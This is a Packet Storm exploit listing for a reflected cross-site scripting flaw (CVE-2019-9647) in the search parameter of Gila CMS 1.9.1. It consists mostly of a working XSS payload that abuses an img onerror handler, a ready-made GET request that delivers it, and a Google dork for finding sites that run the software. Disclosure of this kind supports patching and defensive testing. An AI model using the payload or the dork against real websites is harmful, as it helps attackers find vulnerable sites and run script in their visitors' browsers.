Lucene search

K
packetstormAhmet Umit BayramPACKETSTORM:152153
HistoryMar 19, 2019 - 12:00 a.m.

Gila CMS 1.9.1 Cross Site Scripting

2019-03-1900:00:00
Ahmet Umit Bayram
packetstormsecurity.com
47

EPSS

0.002

Percentile

51.8%

`# Exploit Title: Gila CMS (search) Cross Site Scripting  
# Google Dork: intext:"Powered By Gila CMS"  
# Date: 11.03.2019  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://gilacms.com  
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip  
# Demo Site: https://gilacms.com/demo/  
# Version: 1.9.1  
# Tested on: Kali Linux  
# CVE: CVE-2019-9647  
  
# Vulnerable Parameter: search  
  
# Payload: <--`<img/src=` onerror=confirm``> --!>  
  
# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>  
`

EPSS

0.002

Percentile

51.8%